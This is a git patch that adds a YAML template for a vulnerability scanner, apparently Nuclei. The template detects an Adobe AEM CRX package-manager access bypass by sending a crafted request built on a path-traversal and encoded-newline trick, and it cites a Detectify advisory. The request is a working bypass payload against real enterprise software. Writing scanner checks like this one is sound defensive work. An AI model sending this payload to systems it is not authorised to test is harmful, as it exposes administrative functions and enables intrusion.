From 91b673ad17f460e9a87dc6efa5c0377116c5e472 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 28 Jun 2021 20:20:58 +0530
Subject: [PATCH] Create aem-crx-bypass.yaml

---
 misconfiguration/aem/aem-crx-bypass.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 misconfiguration/aem/aem-crx-bypass.yaml

diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml
new file mode 100644
index 0000000000..67ab69b627
--- /dev/null
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@@ -0,0 +1,22 @@
+id: aem-crx-bypass
+
+info: 
+  author: dhiyaneshDK
+  name: AEM CRX Bypass
+  severity: critical
+  reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
+  tags: aem
+
+requests:
+  - raw:
+      - |
+        GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+        Referer: {{BaseURL}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+    matchers:
+      - type: word
+        word:
+          - "results:"